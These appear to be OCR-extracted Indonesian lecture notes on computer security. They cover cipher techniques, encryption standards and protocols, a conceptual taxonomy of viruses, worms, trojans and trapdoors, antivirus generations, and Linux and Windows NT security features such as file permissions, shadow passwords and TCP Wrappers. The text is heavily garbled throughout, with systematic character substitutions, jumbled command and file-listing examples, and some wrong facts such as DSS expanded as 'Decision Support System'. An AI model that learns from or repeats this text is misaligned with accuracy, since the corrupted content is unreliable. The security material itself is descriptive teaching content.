@ambar 8. .nkripsi dengan .kspansi "ipherteKtnya adalah U4$, .0,)0-$, $1$?/$, ?)P-A@?$F)0$,U. $turan ekspansi dapat dibuat lebih kompleks. -erkadang teknik ekspansi digabungkan dengan teknik lainnya, karena teknik ini bila berdiri sendiri terlalu mudah untuk dipecahkan. e* Pemampatan 'Compa,t!on9 Mengurangi panjang pesan atau jumlah bloknya adalah cara lain untuk menyembunyikan isi pesan. "ontoh sederhana ini menggunakan cara menghilangkan setiap karakter ke!tiga secara berurutan. 0arakter!karakter yang dihilangkan disatukan kembali dan disusulkan sebagai UlampiranU dari pesan utama, dengan dia&ali oleh suatu karakter khusus, dalam contoh ini digunakan UDU. Proses yang terjadi untuk plainteKt kita adalah '

@ambar J. .nkripsi dengan Pemampatan $turan penghilangan karakter dan karakter khusus yang berfungsi sebagai pemisah menjadi dasar untuk proses dekripsi cipherteKt menjadi plainteKt kembali. /engan menggunakan kelima teknik dasar kriptografi diatas, dapat diciptakan kombinasi teknik kriptografi yang amat banyak, dengan faktor yang membatasi semata!mata hanyalah kreati%itas dan imajinasi kita. :alaupun sekilas terlihat sederhana, kombinasi teknik dasar kriptografi dapat menghasilkan teknik kriptografi turunan yang cukup kompleks, dan beberapa teknik dasar kriptografi masih digunakan dalam teknik kriptografi modern. 0ER0A2AI (OLU(I ENKRIP(I MODERN 6. /ata .ncryption 1tandard (/.1) standar bagi 51$ @o%ernment didukung $,1) dan ).-F popular untuk metode secret key terdiri dari ' =G!bit, 4B!bit dan <K4B!bit (-riple /.1) ;. $d%anced .ncryption 1tandard ($.1) untuk menggantikan /.1 (launching akhir ;GG6) 3al ' 6G

Keamanan Komputer
<. menggunakan %ariable length block chipper key length ' 6;J!bit, 67;!bit, ;4B!bit dapat diterapkan untuk smart card.

/igital "ertificate 1er%er (/"1) %erifikasi untuk digital signature autentikasi user menggunakan public dan pri%ate key contoh ' ,etscape "ertificate 1er%er )P 1ecurity ()P1ec) enkripsi public#pri%ate key dirancang oleh ")1"A 1ystem menggunakan /.1 =G!bit dan authentication built!in pada produk ")1"A solusi tepat untuk Mirtual Pri%ate ,et&ork (MP,) dan ?emote ,et&ork $ccess 0erberos solusi untuk user authentication dapat menangani multiple platform#system free charge (open source) )BM menyediakan %ersi komersial ' @lobal 1ign An (@1A) Point to point -unneling Protocol(PP-P), +ayer -&o -unneling Protocol (+;-P) dirancang oleh Microsoft autentication berdasarkan PPP(Point to point protocol) enkripsi berdasarkan algoritm Microsoft (tidak terbuka) terintegrasi dengan ,A1 Microsoft (,-, ;GGG, PP) ?emote $ccess /ial!in 5ser 1er%ice (?$/)51) multiple remote access de%ice menggunakan 6 database untuk authentication didukung oleh <com, ")1"A, $scend tidak menggunakan encryption ?1$ .ncryption dirancang oleh ?i%est, 1hamir, $dleman tahun 6788 standar de facto dalam enkripsi public#pri%ate key didukung oleh Microsoft, apple, no%ell, sun, lotus mendukung proses authentication multi platform 1ecure 3ash $lgoritm (13$) dirancang oleh ,ational )nstitute of 1tandard and -echnology (,)1-) 51$. bagian dari standar /11(/ecision 1upport 1ystem) 51$ dan bekerja sama dengan /.1 untuk digital signature. 13$!6 menyediakan 6BG!bit message digest Mersi ' 13$!;4B, 13$!<J=, 13$!46; (terintegrasi dengan $.1) dirancang oleh Prof. ?obert ?i%est (?1$, M)-) tahun 6776 menghasilkan 6;J!bit digest. cepat tapi kurang aman

=.

4.

B.

8.

J.

7.

6G. M/4

66. 1ecure 1hell (113) digunakan untuk client side authentication antara ; sistem mendukung 5,)P, &indo&s, A1#; melindungi telnet dan ftp (file transfer protocol) 6;. 1ecure 1ocket +ayer (11+) 3al ' 66

Keamanan Komputer
dirancang oleh ,etscape menyediakan enkripsi ?1$ pada layes session dari model A1). independen terhadap ser%ise yang digunakan. melindungi system secure &eb e!commerce metode public#pri%ate key dan dapat melakukan authentication terintegrasi dalam produk bro&ser dan &eb ser%er ,etscape.

6<. 1ecurity -oken aplikasi penyimpanan pass&ord dan data user di smart card 6=. 1imple 0ey Management for )nternet Protocol seperti 11+ bekerja pada le%el session model A1). menghasilkan key yang static, mudah bobol. APLIKA(I ENKRIP(I Beberapa aplikasi yang memerlukan enkripsi untuk pengamanan data atau komunikasi diantaranya adalah ' a. *asa telekomunikasi .nkripsi untuk mengamankan informasi konfidensial baik berupa suara, data, maupun gambar yang akan dikirimkan ke la&an bicaranya. .nkripsi pada transfer data untuk keperluan manajemen jaringan dan transfer on!line data billing. .nkripsi untuk menjaga copyright dari informasi yang diberikan. b. Militer dan pemerintahan .nkripsi diantaranya digunakan dalam pengiriman pesan. Menyimpan data!data rahasia militer dan kenegaraan dalam media penyimpanannya selalu dalam keaadan terenkripsi. c. /ata Perbankan )nformasi transfer uang antar bank harus selalu dalam keadaan terenkripsi d. /ata konfidensial perusahaan ?encana strategis, formula!formula produk, database pelanggan#karya&an dan database operasional pusat penyimpanan data perusahaan dapat diakses secara on!line. -eknik enkripsi juga harus diterapkan untuk data konfidensial untuk melindungi data dari pembacaan maupun perubahan secara tidak sah. e. Pengamanan electronic mail Mengamankan pada saat ditransmisikan maupun dalam media penyimpanan. $plikasi enkripsi telah dibuat khusus untuk mengamankan e!mail, diantaranya P.M (Pri%acy .nhanced Mail) dan P@P (Pretty @ood Pri%acy), keduanya berbasis /.1 dan ?1$. f. 0artu Plastik .nkripsi pada 1)M "ard, kartu telepon umum, kartu langganan -M kabel, kartu kontrol akses ruangan dan komputer, kartu kredit, kartu $-M, kartu pemeriksaan medis, dll .nkripsi teknologi penyimpanan data secara magnetic, optik, maupun chip.

KEAMANAN DARI DE:IL PRO2RAM Ta#sonom! an,aman peran #at luna# - #las!%!#as! pro ram ja"at 'mal!,!ous pro ram9 ' 6. Program!program yang memerlukan program inang (host program). Fragmen program tidak dapat mandiri secara independen dari suatu program aplikasi, program utilitas atau program sistem. ;. Program!program yang tidak memerlukan program inang. Program sendiri yang dapat dijad&alkan dan dijalankan oleh sistem operasi. 3al ' 6;

Keamanan Komputer
T!pe.t!pe pro ram ja"at : 6. 0a,ter!a ' program yang mengkonsumsi sumber daya sistem dengan mereplikasi dirinya sendiri. Bacteria tidak secara eksplisit merusak file. -ujuan program ini hanya satu yaitu mereplikasi dirinya. Program bacteria yang sederhana bisa hanya mengeksekusi dua kopian dirinya secara simultan pada sistem multiprogramming atau menciptakan dua file baru, masing!masing adalah kopian file program bacteria. 0edua kopian in kemudian mengkopi dua kali, dan seterusnya. ;. Lo !, bomb ' logik yang ditempelkan pada program komputer agar memeriksa suatu kumpulan kondisi di sistem. 0etika kondisi!kondisi yang dimaksud ditemui, logik mengeksekusi suatu fungsi yang menghasilkan aksi!aksi tak diotorisasi. +ogic bomb menempel pada suatu program resmi yang diset meledak ketika kondisi!kondisi tertentu dipenuhi. "ontoh kondisi!kondisi untuk memicu logic bomb adalah ada atau tudak adanya file!file tertentu, hari tertentu daru minggu atau tanggal, atau pemakai menjalankan aplikasi tertentu. Begitu terpicu, bomb mengubah atau menghapus data atau seluruh file, menyebabkan mesin terhenti, atau mengerjakan perusakan lain. Trapdoor : -itik masuk tak terdokumentasi rahasia di satu program untuk memberikan akses tanpa metode!metode otentifikasi normal. -rapdoor telah dipakai secara benar selama bertahun!tahun oleh pemogram untuk mencari kesalahan program. /ebugging dan testing biasanya dilakukan pemogram saat mengembangkan aplikasi. 5ntuk program yang mempunyai prosedur otentifikasi atau setup lama atau memerlukan pemakai memasukkan nilai!nilai berbeda untuk menjalankan aplikasi maka debugging akan lama bila harus mele&ati prosedur!prosedur tersebut. 5ntuk debug program jenis ini, pengembang membuat ke&enangan khusus atau menghilangkan keperluan setup dan otentifikasi. -rapdoor adalah kode yang menerima suatu barisan masukan khusus atau dipicu dengan menjalankan )/ pemakai tertentu atau barisan kejahatan tertentu. -rapdoor menjadi ancaman ketika digunakan pemrogram jahat untuk memperoleh pengkasesan tak diotorisasi. Pada kasus nyata, auditor (pemeriks) perangkat lunak dapat menemukan trapdoor pada produk perangkat lunak dimana nama pencipta perangkat lunak berlakuk sebagai pass&ord yang memintas proteksi perangkat lunak yang dibuatnya. $dalah sulit mengimplementasikan kendali!kendali perangkat lunak untuk trapdoor. Trojan "orse ' ?utin tak terdokumentasi rahasia ditempelkan dalam satu program berguna. Program yang berguna mengandung kode tersembunyi yang ketika dijalankan melakukan suatu fungsi yang tak diinginkan. .ksekusi program menyebabkan eksekusi rutin rahasia ini. Program!program trojan horse digunakan untuk melakukan fungsi!fungsi secara tidak langsung dimana pemakai tak diotorisasi tidak dapat melakukannya secara langsung. "ontoh, untuk dapat mengakses file!file pemakai lain pada sistem dipakai bersama, pemakai dapat menciptakan program trojan horse. -rojan horse ini ketika program dieksekusi akan mengubah ijin!ijin file sehinga file!file dapat dibaca oleh sembarang pemakai. Pencipta program dapat menyebarkan ke pemakai!pemakai dengan menempatkan program di direktori bersama dan menamai programnya sedemikian rupa sehingga disangka sebagai program utilitas yang berguna. Program trojan horse yang sulit dideteksi adalah kompilator yang dimodifikasi sehingga menyisipkan kode tambahan ke program!program tertentu begitu dikompilasi, seperti program login. 0ode menciptakan trapdoor pada program login yang mengijinkan pencipta log ke sistem menggunakan pass&ord khusus. -rojan horse jenis ini tak pernah dapat ditemukan jika hanya membaca program sumber. Moti%asi lain dari trojan horse adalah penghancuran data. Program muncul sebagai melakukan fungsi!fungsi berguna (seperti kalkulator), tapi juga secara diam!diam menghapus file!file pemakai. -rojan horse biasa ditempelkan pada program!program atau rutin!rutin yang diambil dari BB1, internet, dan sebagainya. :!rus ' 0ode yang ditempelkan dalam satu program yang menyebabkan pengkopian dirinya disisipkan ke satu program lain atau lebih, dengan cara memodifikasi program!program itu. Modifikasi dilakukan dengan memasukkan kopian program %irus yang dapat menginfeksi program!program lain. 1elain hanya progasi, %irus biasanya melakukan fungsi yang tak diinginkan. /i dalam %irus komputer, terdapat kode intruksi yang dapat membuat kopian sempurna dirinya. 0etika komputer yang terinfeksi berhubungan (kontak) dengan perangkat lunak yang belum terinfeksi, kopian %irus memasuki program baru. )nfeksi dapat menyebar dari komputer ke komputer melalui pemakai!pemakai yang menukarkan disk atau mengirim program melalui jaringan. Pada lingkungan jaringan, kemampuan mengakses aplikasi dan layanan!layanan komputer lain merupakan fasilitas sempurna penyebaran %irus. Masalah yang ditimbulkan %irus adalah %irus sering merusak sistem komputer seperti menghapus file, partisi disk, atau mengacaukan program. (!#lus "!dup :!rus melalui empat fase (tahap), yaitu ' 3al ' 6<

<.

=.

4.

Keamanan Komputer
Fase tidur (dormant phase). Mirus dalam keadaan menganggur. Mirus akan tiba!tiba aktif oleh suatu kejadian seperti tibanya tanggal tertentu, kehadiran program atau file tertentu, atau kapasitas disk yang mele&ati batas. -idak semua %irus mempunyai tahap ini. Fase propagasi (propagation phase). Mirus menempatkan kopian dirinya ke program lain atau daerah sistem tertentu di disk. Program yang terinfeksi %irus akan mempunyai kloning %irus. 0loning %irus itu dapat kembali memasuki fase propagasi. Fase pemicuan (triggering phase). Mirus diaktifkan untuk melakukan fungsi tertentu. 1eperti pada fase tidur, fase pemicuan dapat disebabkan beragam kejadian sistem termasuk penghitungan jumlah kopian dirinya. Fase eksekusi (eKecution phase). Mirus menjalankan fungsinya, fungsinya mungkin sepele seperti sekedar menampilkan pesan dilayar atau merusak seperti merusak program dan file!file data, dan sebagainya. 0ebanyakan %irus melakukan kerjanya untuk suatu sistem operasi tertentu, lebih spesifik lagi pada platform perangkat keras tertentu. Mirus!%irus dirancang memanfaatkan rincian!rincian dan kelemahan!kelemahan sistem tertentu. Klas!%!#as! t!pe +!rus ' a. Parasitic %irus. Merupakan %irus tradisional dan bentuk %irus yang paling sering. -ipe ini mencantolkan dirinya ke file .eKe. Mirus mereplikasi ketika program terinfeksi dieksekusi dengan mencari file!file .eKe lain untuk diinfeksi. b. Memory resident %irus. Mirus memuatkan diri ke memori utama sebagai bagian program yang menetap. Mirus menginfeksi setiap program yang dieksekusi. c. Boot sector %irus. Mirus menginfeksi master boot record atau boot record dan menyebar saat sistem diboot dari disk yang berisi %irus. d. 1tealth %irus. Mirus yang bentuknya telah dirancang agar dapat menyembunyikan diri dari deteksi perangkat lunak anti%irus. e. Polymorphic %irus. Mirus bermutasi setiap kali melakukan infeksi. /eteksi dengan penandaan %irus tersebut tidak dimungkinkan. Penulis %irus dapat melengkapi dengan alat!alat bantu penciptaan %irus baru (%irus creation toolkit, yaitu rutin!rutin untuk menciptakan %irus!%irus baru). /engan alat bantu ini penciptaan %irus baru dapat dilakukan dengan cepat. Mirus!%irus yang diciptakan dengan alat bantu biasanya kurang canggih dibanding %irus!%irus yang dirancang dari a&al.

B.

;orm ' Program yang dapat mereplikasi dirinya dan mengirim kopian!kopian dari komputer ke komputer le&at hubungan jaringan. Begitu tiba, &orm diaktifkan untuk mereplikasi dan progasai kembali. 1elain hanya propagasi, &orm biasanya melakukan fungsi yang tak diinginkan. ,et&ork &orm menggunakan hubungan jaringan untuk menyebar dari sistem ke sistem lain. 1ekali aktif di suatu sistem, net&ork &orm dapat berlaku seperti %irus atau bacteria, atau menempelkan program trojan horse atau melakukan sejumlah aksi menjengkelkan atau menghancurkan. 5ntuk mereplikasi dirinya, net&ork &orm menggunakan suatu layanan jaringan, seperti ' Fasilitas surat elektronik (electronic mail facility), yaitu &orm mengirimkan kopian dirinya ke sistem!sistem lain. 0emampuan eksekusi jarak jauh (remote eKecution capability), yaitu &orm mengeksekusi kopian dirinya di sistem lain. 0emampuan login jarak jauh (remote login capability), yaitu &orm log pada sistem jauh sebagai pemakai dan kemudian menggunakan perintah untuk mengkopi dirinya dari satu sistem ke sistem lain. 0opian program &orm yang baru kemudian dijalankan di sistem jauh dan melakukan fungsi!fungsi lain yang dilakukan di sistem itu, &orm terus menyebar dengan cara yang sama. ,et&ork &orm mempunyai ciri!ciri yang sama dengan %irus komputer, yaitu mempunyai fase!fase sama, yaitu ' /ormant phase, Propagation phase, -rigerring phase, .Kecution phase. ,et&ork &orm juga berusaha menentukan apakah sistem sebelumnya telah diinfeksi sebelum mengirim kopian dirinya ke sistem itu.

Ant!+!rus 1olusi ideal terhadap ancaman %irus adalah pen,e a"an. *aringan diijinkan %irus masuk ke sistem. 1asaran ini, tak mungkin dilaksanakan sepenuhnya. Pencegahan dapat mereduksi sejumlah serangan %irus. 1etelah pencegahan terhadap masuknya %irus, maka pendekatan berikutnya yang dapat dilakukan adalah ' 6. Dete#s!. Begitu infeksi telah terjadi, tentukan apakah infeksi memang telah terjadi dan cari lokasi %irus. ;. Ident!%!#as!. Begitu %irus terdeteksi maka identifikasi %irus yang menginfeksi program. <. Pen "!lan an. Begitu %irus dapat diidentifikasi maka hilangkan semua jejak %irus dari program yang terinfeksi dan program dikembalikan ke semua (sebelum terinfeksi). *ika deteksi %irus sukses dilakukan, tapi identifikasi atau penghilangan jejak tidak dapat dilakukan, maka alternatif yang dilakukan adalah menghapus program yang terinfeksi dan kopi kembali backup program yang masih bersih. 3al ' 6=

Keamanan Komputer
Perkembangan program anti%irus dapat diperiode menjadi empat generasi, yaitu ' 6. 2eneras! pertama : sekedar scanner sederhana. $nti%irus menscan program untuk menemukan penanda (signature) %irus. :alaupun %irus mungkin berisi karakter!karakter %arian, tapi secara esensi mempunyai struktur dan pola bit yang sama di semua kopiannya. -eknis ini terbatas untuk deteksi %irus!%irus yang telah dikenal. -ipe lain anti%irus generasi pertama adalah mengelola rekaman panjang (ukuran) program dan memeriksa perubahan panjang program. ;. 2eneras! #edua : scanner yang pintar (heuristic scanner). $nti%irus menscan tidak bergantung pada penanda spesifik. $nti%irus menggunakan aturan!aturan pintar (heuristic rules) untuk mencari kemungkinan infeksi %irus.-eknik yang dipakai misalnya mencari fragmen! fragmen kode yang sering merupakan bagian %irus. "ontohnya, anti%irus mencari a&al loop enkripsi yang digunakan polymorphic %irus dan menemukan kunci enkripsi. Begitu kunci ditemukan, anti%irus dapat mendeskripsi %irus untuk identifikasi dan kemudian menghilangkan infeksi %irus. -eknik ini adalah pemeriksanaan integritas. "hecksum dapat ditambahkan di tiap program. *ika %irus menginfeksi program tanpa mengubah checksum, maka pemeriksaan integritas akan menemukan perubahan itu. 5ntuk menanggulangi %irus canggih yang mampu mengubah checksum saat menginfeksi program, fungsi hash terenkripsi digunakan. 0unci enkripsi disimpan secara terpisah dari program sehingga program tidak dapat menghasilkan kode hash baru dan mengenkripsinya. /engan menggunakan fungsi hash bukan checksum sederhana maka mencegah %irus menyesuaikan program yang menghasilkan kode hash yang sama seperti sebelumnya. <. 2eneras! #et! a : jebakan!jebakan akti%itas (acti%ity trap). Program anti%irus merupakan program yang menetap di memori (memory resident program). Program ini mengidentifikasi %irus melalui aksi! aksinya bukan dari struktur program yang diinfeksi. /engan anti%irus semacam in tak perlu mengembangkan penanda!penanda dan aturan!aturan pintar untuk beragam %irus yang sangat banyak. /engan cara ini yang diperlukan adalah mengidentifikasi kumpulan instruksi yang berjumlah sedikit yang mengidentifikasi adanya usaha infeksi. 0alau muncul kejadian ini, program anti%irus segera menginter%ensi. =. 2eneras! #eempat : proteksi penuh (full featured protection). $nti%irus generasi ini menggunakan beragam teknik anti%irus secara bersamaan. -eknik!teknik ini meliputi scanning dan jebakan!jebakan akti%itas. $nti%irus juga mempunyai senarai kapabilitas pengaksesan yang membatasi kemampuan %irus memasuki sistem dan membatasi kemampuan %irus memodifikasi file untuk menginfeksi file. Pertempuran antara penulis %irus dan pembuat anti%irus masih berlanjut. :alau beragam strategi lebih lengkap telah dibuat untuk menanggulangi %irus, penulis %irus pun masih berlanjut menulis %irus yang dapat mele&ati barikade!barikade yang dibuat penulis anti%irus. 5ntuk pengaman sistem komputer, sebaiknya pengaksesandan pemakaian komputer dia&asi dengan seksama sehingga tidak menjalankan program atau memakai disk yang belum terjamin kebersihannya dari infeksi %irus. Pencegahan terbaik terhadap ancaman %irus adalah mencegah %irus memasuki sistem disaat yang pertama. KEAMANAN (I(TEM OPERA(I L!nu< Komponen Ars!te#tur Keamanan L!nu< : )* A,,ount Pema#a! 'user a,,ount9

0euntungan ' 0ekuasaan dalam satu account yaitu root, sehingga mudah dalam administrasi system. 0ecerobohan salah satu user tidak berpengaruh kepada system secara keseluruhan. Masing!masing user memiliki pri%acy yang ketat Macam 5ser ' ?oot ' kontrol system file, user, sumber daya (de%ices) dan akses jaringan 5ser ' account dengan kekuasaan yang diatur oleh root dalam melakukan aktifitas dalam system. @roup ' kumpulan user yang memiliki hak sharing yang sejenis terhadap suatu de%ices tertentu. 4* Kontrol A#ses se,ara D!s#res! 'D!s,ret!onar& A,,ess ,ontrol9

/iscretionary $ccess control (/$") adalah metode pembatasan yang ketat, yang meliputi ' 1etiap account memiliki username dan pass&ord sendiri. 1etiap file#de%ice memiliki atribut(read#&rite#eKecution) kepemilikan, group, dan user umum. Mirus tidak akan mencapai file system, jika sebuah user terkena, maka akan berpengaruh pada file!file yang dimiliki oleh user yang mengeksekusi file tersebut.

3al ' 64

Keamanan Komputer
*ika kita lakukan list secara detail menggunakan Ils Vl, kita dapat melihat penerapan /$" pada file system linuK ' d r&! ! !K ! ! ! 4 fade users 6G;= Feb J 6;'<G /esktop ! r&! r ! ! r ! ! 7 @oh hack <6J Mar <G G7'G4 borg.dead.letter ! ) r&! 4 r!! 5 r!! 6 7 7 @oh 8 hack = <6J > Mar ? <G G7'G4 )@ borg.dead.letter ))

0eterangan ' 6 T tipe dari file ; tanda dash ( ! ) berarti file biasa, d berarti directory, l berarti file link, dsb ; T )Cin akses untuk o&ner (pemilik), rTread#baca, &T&rite#tulis, KTeKecute#eksekusi < T )Cin akses untuk group = T )Cin akses untuk other (user lain yang berada di luar group yang didefinisikan sebelumnya)

4T BT 8T JT 7T 6G T 66 T

*umlah link file ,ama pemilik (o&ner) ,ama @roup Besar file dalam byte Bulan dan tanggal update terakhir :aktu update terakhir ,ama file#de%ice

Perintah!perintah penting pada /$" ' Mengubah iCin akses file ' 6. bu ' ,"mod A u B B o C A D B . C A r B E B e C nama %!le, contoh ' chmod uWK gW& o!r borg.dead.letter ; tambahkan akses eksekusi(e) untuk user (u), tambahkan juga akses &rite(&) untuk group (g) dan kurangi iCin akses read(r) untuk other(o) user. ;. chmod metode octal, bu' ,"mod . . . nama%!le , digit dash ( ! ) pertama untuk iCin akses user, digit ke!; untuk iCin akses group dan digit ke!< untuk iCin akses other, berlaku ketentuan ' r(read) T =, &(&rite) T ;, K (eKecute) T 6 dan tanpa iCin akses T G. "ontoh ' "hmod 8=G borg.dead.letter Berarti ' bagi file bor/*dead*letter berlaku digit ke!6 8T=W;W6TiCin akses r,&,K penuh untuk user. digit ke!; =T=WGWGTiCin akses r untuk group digit ke!< GTGWGWGTtanpa iCin akses untuk other user. Mengubah kepemilikan ' cho&n No&ner#pemilikONnama fileO Mengubah kepemilikan group ' chgrp Ngroup o&nerONnama fileO Menggunakan account root untuk sementara ' _Isu ; system akan meminta pass&ord pass&ord ' [[[[ ; prompt akan berubah jadi pagar, tanda login sebagai root _R Mengaktifkan shado& pass&ord, yaitu membuat file -et,-passEd menjadi dapat dibaca (readable) tetapi tidak lagi berisi pass&ord, karena sudah dipindahkan ke -et,-s"adoE

"ontoh tipikal file -et,-passEd setelah diaktifkan shado&' ` root'K'G'G''#root'#bin#bash fade'K'6GGG'6G<' , , , '#home#fade'#bin#bash ` +ihat user fade, dapat kita baca sebagai berikut ' username Pass&ord 5ser )/ (5)/) @roup )/ (@5)/) 0eterangan tambahan 3ome directory 1hell default ' fade 'K ' 6GGG ' 6G< '! ' #home#fade ' #bin#bash

3al ' 6B

Keamanan Komputer
Pass&ord!nya bisa dibaca (readable), tapi berupa huruf K saja, pass&ord sebenarnya disimpan di file -et,-s"adoE dalam keadaan dienkripsi ' ` root'p"foulj-B-P8o'6G774'G''''' fade'oi3^&B@Bf=ti.'6G774'G'77777'8''' ` Perlun&a Pro a#t!% passEord +inuK menggunakan metode /.1 (/ata .ncription 1tandart) untuk pass&ord!nya. 5ser harus di training dalam memilih pass&ord yang akan digunakannya agar tidak mudah ditebak dengan program!program crack pass&ord dalam ancaman bruto force attack. /an perlu pula ditambah dengan program Bantu cek keamanan pass&ord seperti ' Pass&dW ' meningkatkan loging dan mengingatkan user jika mengisi pass&ord yang mudah ditebak, ftp'##ftp.dartmouth.edu#pub#security $nlpass&d ' dapat membuat aturan standar pengisian pass&ord seperti batas minimum, gabungan huruf besar dengan huruf kecil, gabungan angka dan huruf dsb, ftp'##coast.rs.purdue.edu#pub#tools#uniK# 5* Kontrol a#ses jar!n an 'NetEor# A,,ess Control9 3!reEall l!nu< 6 ' alat pengontrolan akses antar jaringan yang membuat linuK dapat memilih host yang berhak # tidak berhak mengaksesnya. 3un s! 3!reEall l!nu< : $nalisa dan filtering paket Memeriksa paket -"P, lalu diperlakukan dengan kondisi yang sudah ditentukan, contoh paket $ lakukan tindakan B. Blocking content dan protocol Bloking isi paket seperti applet ja%a, acti%eP, Mbscript, "ookies $utentikasi koneksi dan enkripsi Menjalankan enkripsi dalam identitas user, integritas satu session dan melapisi data dengan algoritma enkripsi seperti ' /.1, triple /.1, Blo&fish, )P1ec, 13$, M/4, )/.$, dsb. T!pe %!reEall l!nu< : $pplication!proKy fire&all#$pplication @ate&ays /ilakukan pada le%el aplikasi di layer A1), system proKy ini meneruskan # membagi paket!paket ke dalam jaringan internal. "ontoh ' soft&are -)1 F:-0 (-ursted )nformation 1ystem Fire&all -oolkit) ,et&ork le%el Fire&all, fungsi filter dan bloking paket dilakukan di router. "ontoh ' -"P:rappers, aplikasinya ada di #usr#sbin#tcpd. "ara kerjanya ' +ihat isi file -et,-!netd*,on% ' ... telnet stream tcp no&ait root #usr#sbin#telnetd shell stream tcp no&ait root #usr#sbin#rshd pop< stream tcp no&ait root #usr#sbin#pop<d ` dengan diaktifkan -"P&rappers maka isi file -et,-!netd*,on% ' ... telnet stream tcp no&ait root #usr#sbin#tcpd in.telnetd shell stream tcp no&ait root #usr#sbin#tcpd in.rshd !+ pop< stream tcp no&ait root #usr#sbin#tcpd in.pop<d ` setiap ada permintaan layanan jarak jauh, dipotong dulu dengan pencocokan rule set yang telah diatur oleh t,p !n, jika memenuhi syarat diteruskan ke file yang akan diekseskusi, tapi jika tidak memenuhi syarat digagalkan. Pengaturan -"P:rapper dilakukan dengan mengkonfigurasi ; file, yaitu ' #etc#host.allo& host yang diperbolehkan mengakses. #etc#host.deny host yang tidak diperbolehkan mengakses. 6*
6

En#r!ps! 'en,r&pt!on9

5ntuk membedakan fire&all yang built-in di linuK dengan fire&all dedicated yang banyak digunakan dalam teknologi jaringan, maka digunakan istilah fire&all linuK.

3al ' 68

Keamanan Komputer
Penerapan .nkripsi di linuK ' .nkripsi pass&ord menggunakan /.1 ( /ata .ncryption 1tandard ) .nkripsi komunikasi data ' 6. (e,ure ("ell '((H9 Program yang melakukan loging terhadap komputer lain dalam jaringan, mengeksekusi perintah le&at mesin secara remote dan memindahkan file dari satu mesin ke mesin lainnya. .nkripsi dalam bentuk Blo&fish, )/.$, ?1$, -riple /.1. )si 113 1uite ' scp (secure shell copy) mengamankan penggandaan data ssh (secure shell client) model client ssh seperti telnet terenkripsi. ssh!agent otentikasi le&at jaringan dengan model ?1$. sshd (secure shell ser%er) di port ;; ssh!keygen pembuat kunci (key generator) untuk ssh 0onfigurasi dilakukan di ' #etc#sshdQconfig (file konfigurasi ser%er) #etc#sshQconfig (file konfigurasi client) ;. (e,ure so,#et La&er '((L9 mengenkripsi data yang dikirimkan le&at port http. 0onfigurasi dilakukan di ' &eb ser%er $P$"3. dengan ditambah P$-"3 11+. 7* Lo !n

De% : Prosedur dari 1istem Aperasi atau aplikasi merekam setiap kejadian dan menyimpan rekaman tersebut untuk dapat dianalisa. 1emua file log linuK disimpan di directory #%ar#log, antara lain ' Lastlo ' rekaman user login terakhir kali last ' rekaman user yang pernah login dengan mencarinya pada file #%ar#log#&tmp <%erlo ' rekaman informasi login di ftp daemon berupa data &ktu akses, durasi transfer file, ip dan dns host yang mengakses, jumlah#nama file, tipe transfer(binary#$1"))), arah transfer(incoming#outgoing), modus akses(anonymous#guest#user resmi), nama#id#layanan user dan metode otentikasi. A,,essFlo ' rekaman layanan http # &ebser%er. ErrorFlo ' rekaman pesan kesalahan atas ser%ice http # &ebser%er berupa data jam dan &aktu, tipe#alasan kesalahan Messa es ' rekaman kejadian pada kernel ditangani oleh dua daemon ' o 1yslog merekam semua program yang dijalankan, konfigurasi pada syslog.conf o 0log menerima dan merekam semua pesan kernel Dete#s! Pen&usupan 'Intrus!on Dete,t!on9

8*

De% : akti%itas mendeteksi penyusupan secara cepat dengan menggunakan program khusus secara otomatis yang disebut )ntrusion /etection 1ystem T!pe dasar ID( : ?uled based system ' mencatat lalu lintas data jika sesuai dengan database dari tanda penyusupan yang telah dikenal, maka langsung dikategorikan penyusupan. Pendekatan ?uled based system ' o Preemptory (pencegahan) ; )/1 akan memperhatikan semua lalu lintas jaringan, dan langsung bertindak jika dicurigai ada penyusupan. o ?eactionary (reaksi) ; )/1 hanya mengamati file log saja. $dapti%e system ' penerapan eKpert system dalam mengamati lalu lintas jaringan. Pro ram ID( : C"#Etmp ' program pengecekan terhadap entry kosong T,plo d ' program pendeteksi stealth scan (scanning yang dilakukan tanpa membuat sesi tcp) Host entr& ' program pendeteksi login anomaly (perilaku aneh) biCarre beha%iour (perilaku aneh), time anomalies (anomaly &aktu), local anomaly. ;!ndoEs NT Komponen Ars!te#tur Keamanan NT : )* Adm!n!sras! User dan 2roup 3al ' 6J

Keamanan Komputer
1en!s A,,ount User : $dministrator @uest 5ser 1en!s A,,ount 2orup : $dministrator @uest 5ser Aperator back!up Po&er user Aperator ser%er Aperator account Aperator printer Ha# User - 2rup : 3ak basic ' acces computer from net&ork, back!up files#directory, change system time, logon locally, manage auditing and security, log (e%ent %ie&er), restore files and directory, shutdo&n system, take o&nership files or other object, dll. 3ak ad%ance ' access ser%ice and kernel untuk kebutuhan pengembangan system. 4* Keamanan untu# s&stem 3!le A* NT3( : "epat dalam operasi standar file (read V &rite V search) -erdapat system file reco%ery, access control dan permission. Memandang obyek sebagai kumpulan atribut, termasuk permission access. 0* Prote#s! untu# !nte r!tas data Transa,t!on lo !n ' merupakan system file yang dapat di!reco%ery untuk dapat mencatat semua perubahan terakhir pada directory dan file secara otomatis. *ika transaksi system berhasil ,- akan melakukan pembaharuan pada file. *ika transaksi gagal, ,- akan melalui ' -ahap analisis ' mengukur kerusakan dan menentukan lokasi cluster yang harus diperbarui per informasi dalam file log. -ahap redo ' melakukan semua tahapan transaksi yang dicatat pada titik periksa terakhir -ahap undo ' mengembalikan ke kondisi semula untuk semua transaksi yang belum selesai dikerjakan. (e,tor spar!n : -eknik dynamic data reco%ery yang hanya terdapat pada disk 1"1) dengan cara memanfaatkan teknologi fault!tolerant %olume untuk membuat duplikat data dari sector yang mengalami error. Metodenya adalah dengan merekalkulasi dari stripe set &ith parity atau dengan membaca sector dari mirror dri%e dan menulis data tersebut ke sektor baru. Cluster remapp!n : *ika ada kegagalan dalam transaksi )#A pada disk , secara otomatis akan mencari cluster baru yang tidak rusak, lalu menandai alamat cluster yang mengandung bad sector tersebut. C* 3ault toleran,e : 0emampuan untuk menyediakan redudansi data secara realtime yang akan memberikan tindakan penyelamatan bila terjadi kegagalan perangkat keras, korupsi perangkat lunak dan kemungkinan masalah lainnya. -eknologinya disebut ?$)/ (?edudant $rrays of ineKpensi%e /isk) ' sebuah array disk dimana dalam sebuah media penyimpanan terdapat informasi redudan tentang data yang disimpan di sisa media tersebut. 0elebihan ?$)/ ' Meningkatkan kinerja )#A meningkatkan reabilitas media penyimpanan $da ; bentuk fault tolerance ' 6. /isk mirroring (?$)/ 6) ' meliputi penulisan data secara 